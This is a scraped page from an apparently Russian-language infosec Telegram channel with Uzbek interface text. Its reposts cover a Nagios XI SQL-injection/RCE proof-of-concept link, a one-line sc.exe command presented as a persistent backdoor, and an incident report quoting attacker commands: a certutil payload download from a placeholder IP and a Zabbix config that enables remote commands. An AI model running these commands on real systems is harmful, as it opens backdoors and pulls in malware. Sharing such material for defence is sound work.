Fsecurity | HH
Kanalga Telegram’da o‘tish
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Ko'proq ko'rsatish2 010
Obunachilar
+124 soatlar
-47 kunlar
-1030 kunlar
Postlar arxiv
2 010
Repost from APT
👩💻 Nagios XI — RCE
Nagios XI 2024R1.01 has a vulnerability in the
monitoringwizard.php component, allowing authenticated SQL injection (CVE-2024-24401) that lets attackers create an admin account and remote code execution.
🔗 Source:
https://github.com/MAWK0235/CVE-2024-24401
#nagios #sql #rce #privesc #poc #exploit2 010
Repost from 1N73LL1G3NC3
Almost invisible, persistent, fileless, LPE backdoor from an elevated command prompt:
sc.exe sdset scmanager D:(A;;KA;;;WD)
By Gregorz Tworek2 010
Repost from purple shift
Среди интересных инцидентов прошлого года – выявлен очень незаметный способ закрепиться и латерально перемещаться. Небольшое количество изменений в системе, вне поверхности обычного абузного легитимного win-based и под покрывалом обычного софта.
Атакующие приносят нагрузки:
certutil.exe -urlcache -split -f hxxp://<Public IP>/<file with payload>
Используют возможности популярной системы мониторинга Zabbix с конфигурацией, разрешающей удалённое выполнение команд:
EnableRemoteCommands=1
LogFile=0
Server=0.0.0.0/0
ListenPort=5432
Для Zabbix-агентов на фаерволе злоумышленники открывают порт 5432 с красивым и правильным именем PGSQL.
В результате использования этих техник атакующие, очень похожие на группировку Flax Typhoon, более двух лет остаются незамеченными в системе – пока не приходят эксперты по реагированию на инциденты. Подробнее об этой атаке, а также о других интересных инцидентах, расследованных нашими коллегами в прошлом году:
https://securelist.com/incident-response-interesting-cases-2023/113611/2 010
Был обновлен Obsidian Pentest 👾
1. Коммит
2. Коммит
Приятного чтения 📖
Наш Discord сервер
👆🏻Тут можно пообщаться 🦈
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
